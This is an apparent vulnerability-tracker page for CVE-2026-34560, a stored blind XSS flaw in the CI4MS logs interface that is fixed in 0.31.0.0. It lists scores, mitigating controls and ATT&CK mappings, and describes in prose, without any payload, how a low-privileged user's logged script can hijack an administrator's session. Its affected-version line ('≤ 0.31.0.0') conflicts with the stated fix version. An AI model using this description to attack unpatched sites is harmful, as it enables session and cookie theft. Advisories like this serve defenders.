CVE-2026-34560

CriticalPublic PoC

Published: 01 April 2026

Published

01 April 2026

Modified

13 April 2026

KEV Added

—

Patch

—

CVSS Score 9.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

EPSS Score 0.0002 6.4th percentile

Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-34560 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Ci4-Cms-Erp Ci4Ms. Its CVSS base score is 9.1 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 6.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Browser Session Hijacking (T1185) and 1 other technique. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-15 Information Output Filtering good match

prevent

SI-15 directly requires filtering information prior to output to web pages to prevent cross-site scripting attacks, addressing the unsafe rendering of user-controlled log data in the logs interface.

SI-2 Flaw Remediation good match

prevent

SI-2 mandates timely remediation of identified flaws like this stored XSS vulnerability by applying the patch in CI4MS version 0.31.0.0.

SI-10 Information Input Validation partial match

prevent

SI-10 enforces validation of information inputs to restrict malicious XSS payloads from being accepted and stored in application logs.

MITRE ATT&CK Enterprise TechniquesAI

T1185 Browser Session Hijacking Collection

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

attack.mitre.org →

T1539 Steal Web Session Cookie Credential Access

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

attack.mitre.org →

Why these techniques?

Stored XSS in logs interface allows low-priv user to inject JS payload that executes in admin browser context, directly enabling browser session hijacking (T1185) and theft of web session cookies (T1539) for high confidentiality impact.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within…

logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page. This issue has been patched in version 0.31.0.0.

Deeper analysisAI

CVE-2026-34560 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting CI4MS, a CodeIgniter 4-based CMS skeleton that provides a production-ready, modular architecture with RBAC authorization and theme support. In versions prior to 0.31.0.0, the logs interface renders user-controlled input from application logs without proper output encoding, enabling stored XSS payloads to be injected and persist in the logs.

The vulnerability enables a blind XSS attack scenario, where a low-privileged user (PR:L) with network access (AV:N) can inject a malicious payload into logged data without observing immediate execution. The payload remains dormant until an administrator accesses the logs page, at which point it executes in the admin's browser context. According to the CVSS v3.1 score of 9.1 (AC:L/UI:N/S:C/C:H/I:L/A:L), successful exploitation can lead to high confidentiality impact, such as potential theft of sensitive admin session data, alongside limited integrity and availability effects due to the changed scope.

Mitigation is available in CI4MS version 0.31.0.0, which patches the unsafe rendering in the logs interface. Security practitioners should upgrade to this version immediately, as detailed in the project's GitHub release notes (https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0) and security advisory (https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4).

Details

CWE(s): CWE-79

Affected Products

ci4-cms-erp

ci4ms

≤ 0.31.0.0

CVEs Like This One

CVE-2026-35035Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34561Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-27599Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34989Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34559Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34564Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34566Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34563Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34568Same product: Ci4-Cms-Erp Ci4Ms

CVE-2026-34569Same product: Ci4-Cms-Erp Ci4Ms

References

https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0
Release Notes · security-advisories@github.com
https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4
Exploit, Vendor Advisory · security-advisories@github.com
https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4
Exploit, Vendor Advisory · 134c704f-9b21-4f2e-91b3-4a467353bcc0